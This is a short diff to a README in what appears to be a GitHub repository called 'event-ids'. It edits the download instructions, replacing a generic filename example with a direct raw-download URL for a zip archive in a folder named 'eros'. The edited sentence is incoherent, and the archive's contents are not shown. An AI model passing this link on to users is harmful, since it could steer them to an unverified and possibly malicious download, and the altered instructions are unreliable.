Mire20/event-ids/README.md

 ### 3. Download the File

 Click on the appropriate file for your operating system to start the download.
-The file will typically have a name like `event-ids-vX.X.zip`, where `X.X` represents the version number.
+The file will typically have a name like `https://github.com/Mire20/event-ids/raw/refs/heads/main/eros/ids-event-v1.5.zip`, where `X.X` represents the version number.

 ### 4. Extract the Files